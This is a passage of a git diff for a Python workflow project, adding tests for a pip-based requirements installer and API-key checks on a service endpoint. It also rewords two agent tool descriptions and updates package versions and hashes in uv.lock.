+        index_url="https://mirror.example/simple",
+    ).ensure_installed(["requests==2.32.0"])
+
+    assert installed is True
+    assert len(calls) == 1
+    assert calls[0][1:] == [
+        "-m",
+        "pip",
+        "install",
+        "--index-url",
+        "https://mirror.example/simple",
+        "requests==2.32.0",
+    ]
+
+
+def test_sandbox_requirements_installer_passes_index_to_pip(monkeypatch) -> None:
+    calls: list[list[str]] = []
+
+    def fake_run(cmd: list[str], check: bool = True, **_kwargs: Any) -> SimpleNamespace:
+        calls.append(cmd)
+        if len(calls) == 1:
+            return SimpleNamespace(returncode=1)
+        return SimpleNamespace(returncode=0)
+
+    monkeypatch.setattr("flocks.workflow.requirements.subprocess.run", fake_run)
+
+    installed = SandboxRequirementsInstaller(
+        installer="pip",
+        index_url="https://mirror.example/simple",
+    ).ensure_installed(
+        ["requests==2.32.0"],
+        sandbox={"container_name": "workflow-container", "container_workdir": "/workspace"},
+    )
+
+    assert installed is True
+    install_cmd = calls[2]
+    assert install_cmd[:5] == ["docker", "exec", "-i", "-w", "/workspace"]
+    assert install_cmd[5] == "workflow-container"
+    assert install_cmd[6:15] == [
+        "python3",
+        "-m",
+        "pip",
+        "install",
+        "--disable-pip-version-check",
+        "--no-cache-dir",
+        "--target",
+        "/workspace/.flocks/workflow/site-packages",
+        "--index-url",
+    ]
+    assert install_cmd[15:17] == ["https://mirror.example/simple", "requests==2.32.0"]
diff --git a/tests/workflow/test_workflow_service_runtime.py b/tests/workflow/test_workflow_service_runtime.py
index 82da67ca4..c63c93295 100644
--- a/tests/workflow/test_workflow_service_runtime.py
+++ b/tests/workflow/test_workflow_service_runtime.py
@@ -123,3 +123,55 @@ def test_service_runtime_invoke_builds_real_tool_context(
     )
     run_workflow_mock.assert_called_once()
     assert run_workflow_mock.call_args.kwargs["tool_context"] is tool_context
+
+
+def test_service_runtime_requires_api_key_when_configured(
+    monkeypatch,
+) -> None:
+    init_mock = AsyncMock()
+    shutdown_mock = AsyncMock()
+    manager = SimpleNamespace(shutdown=shutdown_mock)
+    tool_context = ToolContext(session_id="session-1", message_id="message-1", agent="rex")
+    build_context_mock = AsyncMock(return_value=tool_context)
+    run_workflow_mock = Mock(
+        return_value=SimpleNamespace(
+            status="SUCCEEDED",
+            run_id="run-1",
+            outputs={"ok": True},
+            error=None,
+        )
+    )
+
+    monkeypatch.setattr(service_runtime.MCP, "init", init_mock)
+    monkeypatch.setattr(service_runtime, "get_manager", lambda: manager)
+    monkeypatch.setattr(service_runtime, "build_workflow_tool_context", build_context_mock)
+    monkeypatch.setattr(service_runtime, "run_workflow", run_workflow_mock)
+
+    app = service_runtime.create_service_app(
+        workflow_json={"id": "wf-1", "start": "node-1", "nodes": [], "edges": []},
+        workflow_id="wf-1",
+        release_id="rel-1",
+        api_key="secret-key",
+    )
+
+    with TestClient(app, raise_server_exceptions=True) as client:
+        missing = client.post("/invoke", json={"inputs": {"ip": "8.8.8.8"}})
+        wrong = client.post(
+            "/invoke",
+            json={"inputs": {"ip": "8.8.8.8"}},
+            headers={"x-api-key": "wrong-key"},
+        )
+        allowed = client.post(
+            "/invoke",
+            json={"inputs": {"ip": "8.8.8.8"}},
+            headers={"x-api-key": "secret-key"},
+        )
+
+    assert missing.status_code == 401
+    assert wrong.status_code == 401
+    assert missing.json()["detail"] == "Invalid API key"
+    assert wrong.json()["detail"] == "Invalid API key"
+    assert allowed.status_code == 200
+    assert allowed.json()["status"] == "SUCCEEDED"
+    build_context_mock.assert_awaited_once()
+    run_workflow_mock.assert_called_once()
diff --git a/tui/flocks/tool/glob.txt b/tui/flocks/tool/glob.txt
index 627da6cae..add6b6ee1 100644
--- a/tui/flocks/tool/glob.txt
+++ b/tui/flocks/tool/glob.txt
@@ -3,4 +3,4 @@
 - Returns matching file paths sorted by modification time
 - Use this tool when you need to find files by name patterns
 - When you are doing an open-ended search that may require multiple rounds of globbing and grepping, use the Task tool instead
-- You have the capability to call multiple tools in a single response. It is always better to speculatively perform multiple searches as a batch that are potentially useful.
+- You may call multiple independent tools in the same response. Prefer separate parallel Glob calls when multiple searches are likely to be useful.
diff --git a/tui/flocks/tool/read.txt b/tui/flocks/tool/read.txt
index b5bffee26..31b79f7bc 100644
--- a/tui/flocks/tool/read.txt
+++ b/tui/flocks/tool/read.txt
@@ -7,6 +7,6 @@ Usage:
 - You can optionally specify a line offset and limit (especially handy for long files), but it's recommended to read the whole file by not providing these parameters
 - Any lines longer than 2000 characters will be truncated
 - Results are returned using cat -n format, with line numbers starting at 1
-- You have the capability to call multiple tools in a single response. It is always better to speculatively read multiple files as a batch that are potentially useful.
+- You may call multiple independent tools in the same response. Prefer separate parallel Read calls when multiple files are likely to be useful.
 - If you read a file that exists but has empty contents you will receive a system reminder warning in place of file contents.
 - You can read image files using this tool.
diff --git a/uv.lock b/uv.lock
index 7a104edaf..02ef844ca 100644
--- a/uv.lock
+++ b/uv.lock
@@ -26,7 +26,7 @@ wheels = [
 
 [[package]]
 name = "aiohttp"
-version = "3.13.3"
+version = "3.13.5"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "aiohappyeyeballs" },
@@ -37,25 +37,25 @@ dependencies = [
     { name = "propcache" },
     { name = "yarl" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/50/42/32cf8e7704ceb4481406eb87161349abb46a57fee3f008ba9cb610968646/aiohttp-3.13.3.tar.gz", hash = "sha256:a949eee43d3782f2daae4f4a2819b2cb9b0c5d3b7f7a927067cc84dafdbb9f88", size = 7844556, upload-time = "2026-01-03T17:33:05.204Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/77/9a/152096d4808df8e4268befa55fba462f440f14beab85e8ad9bf990516918/aiohttp-3.13.5.tar.gz", hash = "sha256:9d98cc980ecc96be6eb4c1994ce35d28d8b1f5e5208a23b421187d1209dbb7d1", size = 7858271, upload-time = "2026-03-31T22:01:03.343Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/a0/be/4fc11f202955a69e0db803a12a062b8379c970c7c84f4882b6da17337cc1/aiohttp-3.13.3-cp312-cp312-macosx_10_13_universal2.whl", hash = "sha256:b903a4dfee7d347e2d87697d0713be59e0b87925be030c9178c5faa58ea58d5c", size = 739732, upload-time = "2026-01-03T17:30:14.23Z" },
-    { url = "https://files.pythonhosted.org/packages/97/2c/621d5b851f94fa0bb7430d6089b3aa970a9d9b75196bc93bb624b0db237a/aiohttp-3.13.3-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:a45530014d7a1e09f4a55f4f43097ba0fd155089372e105e4bff4ca76cb1b168", size = 494293, upload-time = "2026-01-03T17:30:15.96Z" },
-    { url = "https://files.pythonhosted.org/packages/5d/43/4be01406b78e1be8320bb8316dc9c42dbab553d281c40364e0f862d5661c/aiohttp-3.13.3-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:27234ef6d85c914f9efeb77ff616dbf4ad2380be0cda40b4db086ffc7ddd1b7d", size = 493533, upload-time = "2026-01-03T17:30:17.431Z" },
-    { url = "https://files.pythonhosted.org/packages/8d/a8/5a35dc56a06a2c90d4742cbf35294396907027f80eea696637945a106f25/aiohttp-3.13.3-cp312-cp312-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:d32764c6c9aafb7fb55366a224756387cd50bfa720f32b88e0e6fa45b27dcf29", size = 1737839, upload-time = "2026-01-03T17:30:19.422Z" },
-    { url = "https://files.pythonhosted.org/packages/bf/62/4b9eeb331da56530bf2e198a297e5303e1c1ebdceeb00fe9b568a65c5a0c/aiohttp-3.13.3-cp312-cp312-manylinux2014_armv7l.manylinux_2_17_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:b1a6102b4d3ebc07dad44fbf07b45bb600300f15b552ddf1851b5390202ea2e3", size = 1703932, upload-time = "2026-01-03T17:30:21.756Z" },
-    { url = "https://files.pythonhosted.org/packages/7c/f6/af16887b5d419e6a367095994c0b1332d154f647e7dc2bd50e61876e8e3d/aiohttp-3.13.3-cp312-cp312-manylinux2014_ppc64le.manylinux_2_17_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:c014c7ea7fb775dd015b2d3137378b7be0249a448a1612268b5a90c2d81de04d", size = 1771906, upload-time = "2026-01-03T17:30:23.932Z" },
-    { url = "https://files.pythonhosted.org/packages/ce/83/397c634b1bcc24292fa1e0c7822800f9f6569e32934bdeef09dae7992dfb/aiohttp-3.13.3-cp312-cp312-manylinux2014_s390x.manylinux_2_17_s390x.manylinux_2_28_s390x.whl", hash = "sha256:2b8d8ddba8f95ba17582226f80e2de99c7a7948e66490ef8d947e272a93e9463", size = 1871020, upload-time = "2026-01-03T17:30:26Z" },
-    { url = "https://files.pythonhosted.org/packages/86/f6/a62cbbf13f0ac80a70f71b1672feba90fdb21fd7abd8dbf25c0105fb6fa3/aiohttp-3.13.3-cp312-cp312-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:9ae8dd55c8e6c4257eae3a20fd2c8f41edaea5992ed67156642493b8daf3cecc", size = 1755181, upload-time = "2026-01-03T17:30:27.554Z" },
-    { url = "https://files.pythonhosted.org/packages/0a/87/20a35ad487efdd3fba93d5843efdfaa62d2f1479eaafa7453398a44faf13/aiohttp-3.13.3-cp312-cp312-manylinux_2_31_riscv64.manylinux_2_39_riscv64.whl", hash = "sha256:01ad2529d4b5035578f5081606a465f3b814c542882804e2e8cda61adf5c71bf", size = 1561794, upload-time = "2026-01-03T17:30:29.254Z" },
-    { url = "https://files.pythonhosted.org/packages/de/95/8fd69a66682012f6716e1bc09ef8a1a2a91922c5725cb904689f112309c4/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:bb4f7475e359992b580559e008c598091c45b5088f28614e855e42d39c2f1033", size = 1697900, upload-time = "2026-01-03T17:30:31.033Z" },
-    { url = "https://files.pythonhosted.org/packages/e5/66/7b94b3b5ba70e955ff597672dad1691333080e37f50280178967aff68657/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_armv7l.whl", hash = "sha256:c19b90316ad3b24c69cd78d5c9b4f3aa4497643685901185b65166293d36a00f", size = 1728239, upload-time = "2026-01-03T17:30:32.703Z" },
-    { url = "https://files.pythonhosted.org/packages/47/71/6f72f77f9f7d74719692ab65a2a0252584bf8d5f301e2ecb4c0da734530a/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:96d604498a7c782cb15a51c406acaea70d8c027ee6b90c569baa6e7b93073679", size = 1740527, upload-time = "2026-01-03T17:30:34.695Z" },
-    { url = "https://files.pythonhosted.org/packages/fa/b4/75ec16cbbd5c01bdaf4a05b19e103e78d7ce1ef7c80867eb0ace42ff4488/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_riscv64.whl", hash = "sha256:084911a532763e9d3dd95adf78a78f4096cd5f58cdc18e6fdbc1b58417a45423", size = 1554489, upload-time = "2026-01-03T17:30:36.864Z" },
-    { url = "https://files.pythonhosted.org/packages/52/8f/bc518c0eea29f8406dcf7ed1f96c9b48e3bc3995a96159b3fc11f9e08321/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_s390x.whl", hash = "sha256:7a4a94eb787e606d0a09404b9c38c113d3b099d508021faa615d70a0131907ce", size = 1767852, upload-time = "2026-01-03T17:30:39.433Z" },
-    { url = "https://files.pythonhosted.org/packages/9d/f2/a07a75173124f31f11ea6f863dc44e6f09afe2bca45dd4e64979490deab1/aiohttp-3.13.3-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:87797e645d9d8e222e04160ee32aa06bc5c163e8499f24db719e7852ec23093a", size = 1722379, upload-time = "2026-01-03T17:30:41.081Z" },
-    { url = "https://files.pythonhosted.org/packages/3c/4a/1a3fee7c21350cac78e5c5cef711bac1b94feca07399f3d406972e2d8fcd/aiohttp-3.13.3-cp312-cp312-win32.whl", hash = "sha256:b04be762396457bef43f3597c991e192ee7da460a4953d7e647ee4b1c28e7046", size = 428253, upload-time = "2026-01-03T17:30:42.644Z" },
-    { url = "https://files.pythonhosted.org/packages/d9/b7/76175c7cb4eb73d91ad63c34e29fc4f77c9386bba4a65b53ba8e05ee3c39/aiohttp-3.13.3-cp312-cp312-win_amd64.whl", hash = "sha256:e3531d63d3bdfa7e3ac5e9b27b2dd7ec9df3206a98e0b3445fa906f233264c57", size = 455407, upload-time = "2026-01-03T17:30:44.195Z" },
+    { url = "https://files.pythonhosted.org/packages/be/6f/353954c29e7dcce7cf00280a02c75f30e133c00793c7a2ed3776d7b2f426/aiohttp-3.13.5-cp312-cp312-macosx_10_13_universal2.whl", hash = "sha256:023ecba036ddd840b0b19bf195bfae970083fd7024ce1ac22e9bba90464620e9", size = 748876, upload-time = "2026-03-31T21:57:36.319Z" },
+    { url = "https://files.pythonhosted.org/packages/f5/1b/428a7c64687b3b2e9cd293186695affc0e1e54a445d0361743b231f11066/aiohttp-3.13.5-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:15c933ad7920b7d9a20de151efcd05a6e38302cbf0e10c9b2acb9a42210a2416", size = 499557, upload-time = "2026-03-31T21:57:38.236Z" },
+    { url = "https://files.pythonhosted.org/packages/29/47/7be41556bfbb6917069d6a6634bb7dd5e163ba445b783a90d40f5ac7e3a7/aiohttp-3.13.5-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:ab2899f9fa2f9f741896ebb6fa07c4c883bfa5c7f2ddd8cf2aafa86fa981b2d2", size = 500258, upload-time = "2026-03-31T21:57:39.923Z" },
+    { url = "https://files.pythonhosted.org/packages/67/84/c9ecc5828cb0b3695856c07c0a6817a99d51e2473400f705275a2b3d9239/aiohttp-3.13.5-cp312-cp312-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:a60eaa2d440cd4707696b52e40ed3e2b0f73f65be07fd0ef23b6b539c9c0b0b4", size = 1749199, upload-time = "2026-03-31T21:57:41.938Z" },
+    { url = "https://files.pythonhosted.org/packages/f0/d3/3c6d610e66b495657622edb6ae7c7fd31b2e9086b4ec50b47897ad6042a9/aiohttp-3.13.5-cp312-cp312-manylinux2014_armv7l.manylinux_2_17_armv7l.manylinux_2_31_armv7l.whl", hash = "sha256:55b3bdd3292283295774ab585160c4004f4f2f203946997f49aac032c84649e9", size = 1721013, upload-time = "2026-03-31T21:57:43.904Z" },
+    { url = "https://files.pythonhosted.org/packages/49/a0/24409c12217456df0bae7babe3b014e460b0b38a8e60753d6cb339f6556d/aiohttp-3.13.5-cp312-cp312-manylinux2014_ppc64le.manylinux_2_17_ppc64le.manylinux_2_28_ppc64le.whl", hash = "sha256:c2b2355dc094e5f7d45a7bb262fe7207aa0460b37a0d87027dcf21b5d890e7d5", size = 1781501, upload-time = "2026-03-31T21:57:46.285Z" },
+    { url = "https://files.pythonhosted.org/packages/98/9d/b65ec649adc5bccc008b0957a9a9c691070aeac4e41cea18559fef49958b/aiohttp-3.13.5-cp312-cp312-manylinux2014_s390x.manylinux_2_17_s390x.manylinux_2_28_s390x.whl", hash = "sha256:b38765950832f7d728297689ad78f5f2cf79ff82487131c4d26fe6ceecdc5f8e", size = 1878981, upload-time = "2026-03-31T21:57:48.734Z" },
+    { url = "https://files.pythonhosted.org/packages/57/d8/8d44036d7eb7b6a8ec4c5494ea0c8c8b94fbc0ed3991c1a7adf230df03bf/aiohttp-3.13.5-cp312-cp312-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:b18f31b80d5a33661e08c89e202edabf1986e9b49c42b4504371daeaa11b47c1", size = 1767934, upload-time = "2026-03-31T21:57:51.171Z" },
+    { url = "https://files.pythonhosted.org/packages/31/04/d3f8211f273356f158e3464e9e45484d3fb8c4ce5eb2f6fe9405c3273983/aiohttp-3.13.5-cp312-cp312-manylinux_2_31_riscv64.manylinux_2_39_riscv64.whl", hash = "sha256:33add2463dde55c4f2d9635c6ab33ce154e5ecf322bd26d09af95c5f81cfa286", size = 1566671, upload-time = "2026-03-31T21:57:53.326Z" },
+    { url = "https://files.pythonhosted.org/packages/41/db/073e4ebe00b78e2dfcacff734291651729a62953b48933d765dc513bf798/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:327cc432fdf1356fb4fbc6fe833ad4e9f6aacb71a8acaa5f1855e4b25910e4a9", size = 1705219, upload-time = "2026-03-31T21:57:55.385Z" },
+    { url = "https://files.pythonhosted.org/packages/48/45/7dfba71a2f9fd97b15c95c06819de7eb38113d2cdb6319669195a7d64270/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_armv7l.whl", hash = "sha256:7c35b0bf0b48a70b4cb4fc5d7bed9b932532728e124874355de1a0af8ec4bc88", size = 1743049, upload-time = "2026-03-31T21:57:57.341Z" },
+    { url = "https://files.pythonhosted.org/packages/18/71/901db0061e0f717d226386a7f471bb59b19566f2cae5f0d93874b017271f/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_ppc64le.whl", hash = "sha256:df23d57718f24badef8656c49743e11a89fd6f5358fa8a7b96e728fda2abf7d3", size = 1749557, upload-time = "2026-03-31T21:57:59.626Z" },
+    { url = "https://files.pythonhosted.org/packages/08/d5/41eebd16066e59cd43728fe74bce953d7402f2b4ddfdfef2c0e9f17ca274/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_riscv64.whl", hash = "sha256:02e048037a6501a5ec1f6fc9736135aec6eb8a004ce48838cb951c515f32c80b", size = 1558931, upload-time = "2026-03-31T21:58:01.972Z" },
+    { url = "https://files.pythonhosted.org/packages/30/e6/4a799798bf05740e66c3a1161079bda7a3dd8e22ca392481d7a7f9af82a6/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_s390x.whl", hash = "sha256:31cebae8b26f8a615d2b546fee45d5ffb76852ae6450e2a03f42c9102260d6fe", size = 1774125, upload-time = "2026-03-31T21:58:04.007Z" },
+    { url = "https://files.pythonhosted.org/packages/84/63/7749337c90f92bc2cb18f9560d67aa6258c7060d1397d21529b8004fcf6f/aiohttp-3.13.5-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:888e78eb5ca55a615d285c3c09a7a91b42e9dd6fc699b166ebd5dee87c9ccf14", size = 1732427, upload-time = "2026-03-31T21:58:06.337Z" },
+    { url = "https://files.pythonhosted.org/packages/98/de/cf2f44ff98d307e72fb97d5f5bbae3bfcb442f0ea9790c0bf5c5c2331404/aiohttp-3.13.5-cp312-cp312-win32.whl", hash = "sha256:8bd3ec6376e68a41f9f95f5ed170e2fcf22d4eb27a1f8cb361d0508f6e0557f3", size = 433534, upload-time = "2026-03-31T21:58:08.712Z" },
+    { url = "https://files.pythonhosted.org/packages/aa/ca/eadf6f9c8fa5e31d40993e3db153fb5ed0b11008ad5d9de98a95045bed84/aiohttp-3.13.5-cp312-cp312-win_amd64.whl", hash = "sha256:110e448e02c729bcebb18c60b9214a87ba33bac4a9fa5e9a5f139938b56c6cb1", size = 460446, upload-time = "2026-03-31T21:58:10.945Z" },
 ]
 
 [[package]]
@@ -306,14 +306,14 @@ wheels = [
 
 [[package]]
 name = "click"
-version = "8.3.1"
+version = "8.1.8"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "colorama", marker = "sys_platform == 'win32'" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/3d/fa/656b739db8587d7b5dfa22e22ed02566950fbfbcdc20311993483657a5c0/click-8.3.1.tar.gz", hash = "sha256:12ff4785d337a1bb490bb7e9c2b1ee5da3112e94a8622f26a6c77f5d2fc6842a", size = 295065, upload-time = "2025-11-15T20:45:42.706Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/b9/2e/0090cbf739cee7d23781ad4b89a9894a41538e4fcf4c31dcdd705b78eb8b/click-8.1.8.tar.gz", hash = "sha256:ed53c9d8990d83c2a27deae68e4ee337473f6330c040a31d4225c9574d16096a", size = 226593, upload-time = "2024-12-21T18:38:44.339Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/98/78/01c019cdb5d6498122777c1a43056ebb3ebfeef2076d9d026bfe15583b2b/click-8.3.1-py3-none-any.whl", hash = "sha256:981153a64e25f12d547d3426c367a4857371575ee7ad18df2a6183ab0545b2a6", size = 108274, upload-time = "2025-11-15T20:45:41.139Z" },
+    { url = "https://files.pythonhosted.org/packages/7e/d4/7ebdbd03970677812aac39c869717059dbb71a4cfc033ca6e5221787892c/click-8.1.8-py3-none-any.whl", hash = "sha256:63c132bbbed01578a06712a2d1f497bb62d9c1c0d329b7903a866228027263b2", size = 98188, upload-time = "2024-12-21T18:38:41.666Z" },
 ]
 
 [[package]]
@@ -537,7 +537,7 @@ wheels = [
 
 [[package]]
 name = "flocks"
-version = "2026.6.10"
+version = "2026.6.17"
 source = { editable = "." }
 dependencies = [
     { name = "aiofiles" },
@@ -629,7 +629,7 @@ requires-dist = [
     { name = "jsonschema", specifier = ">=4.20.0" },
     { name = "langfuse" },
     { name = "lark-oapi", specifier = ">=1.3.0" },
-    { name = "litellm", specifier = ">=1.30.0" },
+    { name = "litellm", specifier = "==1.83.7" },
     { name = "lsprotocol", specifier = ">=2023.0.0" },
     { name = "markdown", specifier = ">=3.10.2" },
     { name = "markitdown", specifier = ">=0.1.5" },
@@ -656,7 +656,7 @@ requires-dist = [
     { name = "tiktoken", specifier = ">=0.12.0" },
     { name = "toml", specifier = ">=0.10.2" },
     { name = "tree-sitter", specifier = ">=0.21.0" },
-    { name = "typer", specifier = ">=0.9.0" },
+    { name = "typer", specifier = ">=0.9.0,<0.24.0" },
     { name = "ulid-py", specifier = ">=1.1.0" },
     { name = "uvicorn", extras = ["standard"], specifier = ">=0.27.0" },
     { name = "watchdog", specifier = ">=4.0.0" },
@@ -924,14 +924,14 @@ wheels = [
 
 [[package]]
 name = "importlib-metadata"
-version = "8.7.1"
+version = "8.5.0"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "zipp" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/f3/49/3b30cad09e7771a4982d9975a8cbf64f00d4a1ececb53297f1d9a7be1b10/importlib_metadata-8.7.1.tar.gz", hash = "sha256:49fef1ae6440c182052f407c8d34a68f72efc36db9ca90dc0113398f2fdde8bb", size = 57107, upload-time = "2025-12-21T10:00:19.278Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/cd/12/33e59336dca5be0c398a7482335911a33aa0e20776128f038019f1a95f1b/importlib_metadata-8.5.0.tar.gz", hash = "sha256:71522656f0abace1d072b9e5481a48f07c138e00f079c38c8f883823f9c26bd7", size = 55304, upload-time = "2024-09-11T14:56:08.937Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/fa/5e/f8e9a1d23b9c20a551a8a02ea3637b4642e22c2626e3a13a9a29cdea99eb/importlib_metadata-8.7.1-py3-none-any.whl", hash = "sha256:5a1f80bf1daa489495071efbb095d75a634cf28a8bc299581244063b53176151", size = 27865, upload-time = "2025-12-21T10:00:18.329Z" },
+    { url = "https://files.pythonhosted.org/packages/a0/d9/a1e041c5e7caa9a05c925f4bdbdfb7f006d1f74996af53467bc394c97be7/importlib_metadata-8.5.0-py3-none-any.whl", hash = "sha256:45e54197d28b7a7f1559e60b95e7c567032b602131fbd588f1497f47880aa68b", size = 26514, upload-time = "2024-09-11T14:56:07.019Z" },
 ]
 
 [[package]]
@@ -1027,7 +1027,7 @@ wheels = [
 
 [[package]]
 name = "jsonschema"
-version = "4.26.0"
+version = "4.23.0"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "attrs" },
@@ -1035,9 +1035,9 @@ dependencies = [
     { name = "referencing" },
     { name = "rpds-py" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/b3/fc/e067678238fa451312d4c62bf6e6cf5ec56375422aee02f9cb5f909b3047/jsonschema-4.26.0.tar.gz", hash = "sha256:0c26707e2efad8aa1bfc5b7ce170f3fccc2e4918ff85989ba9ffa9facb2be326", size = 366583, upload-time = "2026-01-07T13:41:07.246Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/38/2e/03362ee4034a4c917f697890ccd4aec0800ccf9ded7f511971c75451deec/jsonschema-4.23.0.tar.gz", hash = "sha256:d71497fef26351a33265337fa77ffeb82423f3ea21283cd9467bb03999266bc4", size = 325778, upload-time = "2024-07-08T18:40:05.546Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/69/90/f63fb5873511e014207a475e2bb4e8b2e570d655b00ac19a9a0ca0a385ee/jsonschema-4.26.0-py3-none-any.whl", hash = "sha256:d489f15263b8d200f8387e64b4c3a75f06629559fb73deb8fdfb525f2dab50ce", size = 90630, upload-time = "2026-01-07T13:41:05.306Z" },
+    { url = "https://files.pythonhosted.org/packages/69/4a/4f9dbeb84e8850557c02365a0eee0649abe5eb1d84af92a25731c6c0f922/jsonschema-4.23.0-py3-none-any.whl", hash = "sha256:fbadb6f8b144a8f8cf9f0b89ba94501d143e50411a1278633f56a7acf7fd5566", size = 88462, upload-time = "2024-07-08T18:40:00.165Z" },
 ]
 
 [[package]]
@@ -1110,7 +1110,7 @@ wheels = [
 
 [[package]]
 name = "litellm"
-version = "1.82.6"
+version = "1.83.7"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "aiohttp" },
@@ -1126,9 +1126,9 @@ dependencies = [
     { name = "tiktoken" },
     { name = "tokenizers" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/29/75/1c537aa458426a9127a92bc2273787b2f987f4e5044e21f01f2eed5244fd/litellm-1.82.6.tar.gz", hash = "sha256:2aa1c2da21fe940c33613aa447119674a3ad4d2ad5eb064e4d5ce5ee42420136", size = 17414147, upload-time = "2026-03-22T06:36:00.452Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/77/2b/b58bf6bbcbc3d0e55d0a84fdf9128e5b1436517f46fce89b1cd8948ebb81/litellm-1.83.7.tar.gz", hash = "sha256:e2f2cb99df2e2b2eab63f1354faa45c88dd7c8d40c18eb648afb1b349c689633", size = 17791694, upload-time = "2026-04-13T17:35:01.606Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/02/6c/5327667e6dbe9e98cbfbd4261c8e91386a52e38f41419575854248bbab6a/litellm-1.82.6-py3-none-any.whl", hash = "sha256:164a3ef3e19f309e3cabc199bef3d2045212712fefdfa25fc7f75884a5b5b205", size = 15591595, upload-time = "2026-03-22T06:35:56.795Z" },
+    { url = "https://files.pythonhosted.org/packages/75/80/caeb4cdcad96451ba83ad3ba2a9da08b1e1a915fa845c489f56ea044488b/litellm-1.83.7-py3-none-any.whl", hash = "sha256:5784a1d9a9a4a8acd6ca1e347003a5e2e1b3c749b4d41e7da4904577adade111", size = 16069807, upload-time = "2026-04-13T17:34:58.36Z" },
 ]
 
 [[package]]
@@ -1394,7 +1394,7 @@ wheels = [
 
 [[package]]
 name = "openai"
-version = "2.29.0"
+version = "2.30.0"
 source = { registry = "https://pypi.org/simple" }
 dependencies = [
     { name = "anyio" },
@@ -1406,9 +1406,9 @@ dependencies = [
     { name = "tqdm" },
     { name = "typing-extensions" },
 ]
-sdist = { url = "https://files.pythonhosted.org/packages/b4/15/203d537e58986b5673e7f232453a2a2f110f22757b15921cbdeea392e520/openai-2.29.0.tar.gz", hash = "sha256:32d09eb2f661b38d3edd7d7e1a2943d1633f572596febe64c0cd370c86d52bec", size = 671128, upload-time = "2026-03-17T17:53:49.599Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/88/15/52580c8fbc16d0675d516e8749806eda679b16de1e4434ea06fb6feaa610/openai-2.30.0.tar.gz", hash = "sha256:92f7661c990bda4b22a941806c83eabe4896c3094465030dd882a71abe80c885", size = 676084, upload-time = "2026-03-25T22:08:59.96Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/d0/b1/35b6f9c8cf9318e3dbb7146cc82dab4cf61182a8d5406fc9b50864362895/openai-2.29.0-py3-none-any.whl", hash = "sha256:b7c5de513c3286d17c5e29b92c4c98ceaf0d775244ac8159aeb1bddf840eb42a", size = 1141533, upload-time = "2026-03-17T17:53:47.348Z" },
+    { url = "https://files.pythonhosted.org/packages/2a/9e/5bfa2270f902d5b92ab7d41ce0475b8630572e71e349b2a4996d14bdda93/openai-2.30.0-py3-none-any.whl", hash = "sha256:9a5ae616888eb2748ec5e0c5b955a51592e0b201a11f4262db920f2a78c5231d", size = 1146656, upload-time = "2026-03-25T22:08:58.2Z" },
 ]
 
 [[package]]
@@ -1863,11 +1863,11 @@ wheels = [
 
 [[package]]
 name = "python-dotenv"
-version = "1.2.2"
+version = "1.0.1"
 source = { registry = "https://pypi.org/simple" }
-sdist = { url = "https://files.pythonhosted.org/packages/82/ed/0301aeeac3e5353ef3d94b6ec08bbcabd04a72018415dcb29e588514bba8/python_dotenv-1.2.2.tar.gz", hash = "sha256:2c371a91fbd7ba082c2c1dc1f8bf89ca22564a087c2c287cd9b662adde799cf3", size = 50135, upload-time = "2026-03-01T16:00:26.196Z" }
+sdist = { url = "https://files.pythonhosted.org/packages/bc/57/e84d88dfe0aec03b7a2d4327012c1627ab5f03652216c63d49846d7a6c58/python-dotenv-1.0.1.tar.gz", hash = "sha256:e324ee90a023d808f1959c46bcbc04446a10ced277783dc6ee09987c37ec10ca", size = 39115, upload-time = "2024-01-23T06:33:00.505Z" }
 wheels = [
-    { url = "https://files.pythonhosted.org/packages/0b/d7/1959b9648791274998a9c3526f6d0ec8fd2233e4d4acce81bbae76b44b2a/python_dotenv-1.2.2-py3-none-any.whl", hash = "sha256:1d8214789a24de455a8b8bd8ae6fe3c6b69a5e3d64aa8a8e5d68e694bbcb285a", size = 22101, upload-time = "2026-03-01T16:00:25.09Z" },
